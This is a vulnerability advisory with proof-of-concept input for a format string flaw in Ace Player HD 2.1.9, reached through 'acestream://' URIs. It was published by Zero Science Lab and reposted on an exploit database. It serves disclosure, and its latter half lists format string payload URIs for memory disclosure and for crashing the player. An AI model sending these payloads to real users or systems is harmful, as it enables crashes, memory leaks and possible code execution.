ACE Stream Media 2.1 (acestream://) Format String Exploit PoC Vendor: ACE Stream Product web page: http://www.acestream.org Affected version: Ace Player HD 2.1.9 (VLC 2.0.5) Summary: Ace Stream is an innovative multimedia platform of a new generation, which includes different products and solutions for ordinary Internet users as well as for professional members of the multimedia market. Ace Stream uses in its core, P2P (peer-to-peer) technology, BitTorrent protocol, which is acknowledged as the most effective protocol to transfer/deliver 'heavy content'. Desc: ACE Stream Media (Ace Player HD) is prone to a remote format string vulnerability because the application fails to properly sanitize user-supplied input thru the URI using the 'acestream://' protocol before including it in the format-specifier argument of a formatted-printing function. A remote attacker may exploit this issue to execute arbitrary code with the privileges of the user running the affected application and/or cause memory address disclosure. Failed exploit attempts may cause denial-of-service (DoS) conditions. Tested on: Microsoft Windows 7 Professional SP1 (EN) 64bit Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2014-5165 Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2014-5165.php 30.12.2013 -- format md: acestream://AAAA%08x.%08x.%08x.%08x.%08x.AAAA acestream://AAAA%08p.%08p.%08p.%08p.%08p.%08p.%08p.%08p.%08pAAAAA acestream://AAAA%s acestream://AAAA%s.AAAA%08x.%08x.%08x.%08x.AAAA acestream://AAAA%08d acestream://%i%i%i%i acestream://%c%c%c%c acestream://%f%f%f%f acestream://AAAA%.8x.%.8p.%.8i.%.8d.%.8f.%.8s.%n.%08x.%08x.%08x.%08x.%08x.%08xAAAA acestream://%15.10s.%15.10s acestream://%8x%8x%8x%8x%8x%8x%8x%8x%8x acestream://%0a%0d acestream://%AA acestream://%p%p%p%p%s crashes: acestream://AAAA%08s acestream://AAAA%n acestream://%08s acestream://%p%p%p%p%s%n acestream://%n acestream://%s%s%s%s acestream://AAAA%15.10s.%15.10s.%15.10s.%15.10s.%15.10s.%15.10sAAAA # Iranian Exploit DataBase = http://IeDb.Ir [2014-01-04]